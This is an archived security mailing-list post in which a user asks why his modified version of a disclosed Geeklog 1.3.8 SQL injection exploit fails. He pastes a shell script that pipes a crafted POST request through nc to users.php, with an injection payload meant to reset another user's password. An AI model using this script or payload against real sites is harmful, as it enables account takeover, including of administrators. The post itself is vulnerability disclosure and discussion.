[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BBB8A153.1792%thomas@outcast-media.com>
From: thomas at outcast-media.com (Thomas Rogg)
Subject: Geeklog exploit
am 19.10.2003 18:21 Uhr schrieb Jouko Pynnonen unter jouko@....fi:
> ...
> The exploit uses the "forgot password" feature introduced in Geeklog
> 1.3.8. By constructing a certain kind of HTTP request, an attacker can
> change any user's Geeklog password, including the administrator
> password. This is because an SQL injection problem. In users.php we have
> this kind of code (line about 750):
> ...
I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."
Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:
-----
#!/bin/sh
echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded
mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----
Thank you,
Thomas
Powered by blists - more mailing lists